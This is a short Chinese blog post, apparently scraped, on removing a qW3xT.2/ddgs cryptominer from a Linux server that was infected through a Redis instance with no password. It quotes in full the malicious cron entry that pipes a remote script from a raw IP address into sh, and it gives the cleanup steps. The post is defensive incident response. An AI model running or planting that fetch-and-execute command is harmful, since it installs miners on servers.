qW3xT.2,解決挖礦病毒。

網站在運行期間感受怪怪的,響應速度慢的不是一丁半點,帶寬5M,不應是這樣的呀redis

因而登陸Xshellshell

top命令

查看cpu狀況以下curl

PID爲3435的進程佔用CPU過大,難道被病毒入侵了嗎?網站

查看該進程文件的絕對路徑url

cd /proc/3435

發現上述紅框文件,因而上網搜索了下,得治是挖礦病毒spa

處理辦法code

  一、刪除tmp目錄裏的qW3xT.2和ddgs.3013文件。blog

  二、刪除定時任務crontab -l 查看是否有異常*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(與計劃任務相同) crontab -e 進入編輯 刪除異常任務。進程

  三、進入var/spool/cron目錄,文件打開root文件查看是否有異常,刪除異常,再進crontabs文件裏對root文件進行查看編輯,刪除異常定時任務並保存。crontab

防止再次侵入病毒解決辦法

  解決redis入口問題,由於最開始沒有設置密碼,因此首先修改redis.conf。設置密碼,而後重啓redis

 

 到此也就解決了刪除了挖礦病毒問題。

感謝你們瀏覽到此處~~~~

相關文章
相關標籤/搜索